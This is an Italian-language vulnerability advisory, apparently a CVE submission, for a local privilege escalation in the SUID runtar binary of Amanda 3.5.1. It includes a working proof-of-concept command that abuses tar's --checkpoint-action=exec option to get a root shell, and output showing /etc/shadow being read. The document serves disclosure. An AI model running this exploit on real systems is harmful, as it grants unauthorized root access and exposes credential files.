
Amanda 3.5.1 secondo LPE.
[Descrizione suggerita] È stata trovata una falla di escalation dei privilegi in Amanda 3.5.1 che può portare l'utente backup ai privilegi di root. Il componente vulnerabile è runtar SUID, che è solo un wrapper per eseguire /usr/bin/tar con argomenti specifici controllabili dall'attaccante. Il programma non verifica correttamente gli argomenti passati al binario tar (presume che tutti gli argomenti debbano essere come --ARG VALUE ma possiamo fornire --ARG=VALUE come un unico argomento).
[Informazioni aggiuntive] Questa falla può essere utilizzata per esecuzione di codice, denial of service, escalation dei privilegi e divulgazione di informazioni. Questo è il PoC per sfruttarla e ottenere una shell di root: backup@maher:/lib/amanda$ id uid=34(backup) gid=34(backup) groups=34(backup),6(disk),26(tape)
backup@maher:/lib/amanda$ head /etc/shadow head: cannot open '/etc/shadow' for reading: Permission denied
backup@maher:/lib/amanda$ ./runtar NOCONFIG tar --create --file=/dev/null --checkpoint=1 --directory=. --checkpoint-action=exec=/bin/sh /dev/null tar: Removing leading `/' from member names
head /etc/shadow
root:!:19132:0:99999:7::: daemon::19101:0:99999:7::: bin::19101:0:99999:7::: sys::19101:0:99999:7::: sync::19101:0:99999:7::: games::19101:0:99999:7::: man::19101:0:99999:7::: lp::19101:0:99999:7::: mail::19101:0:99999:7::: news:*:19101:0:99999:7:::
[Tipo di vulnerabilità Altro] Controllo errato degli argomenti.
[Venditore del prodotto] Amanda
[Codice base del prodotto affetto] runtar - 3.5.1
[Componente affetto] Il binario SUID affetto è: runtar Il file affetto è: runtar.c Le righe di codice affette iniziano dalla riga 162.
[Tipo di attacco] Locale
[Impatto esecuzione di codice] true
[Impatto denial of service] true
[Impatto escalation dei privilegi] true
[Impatto divulgazione di informazioni] true
[Vettori di attacco] Per sfruttare il binario è sufficiente fornire argomenti appositamente predisposti al binario SUID runtar per ottenere l'escalation a root.
[Riferimento] http://www.amanda.org/
[Scopritore] Maher Azzouzi
Use CVE-2022-37705.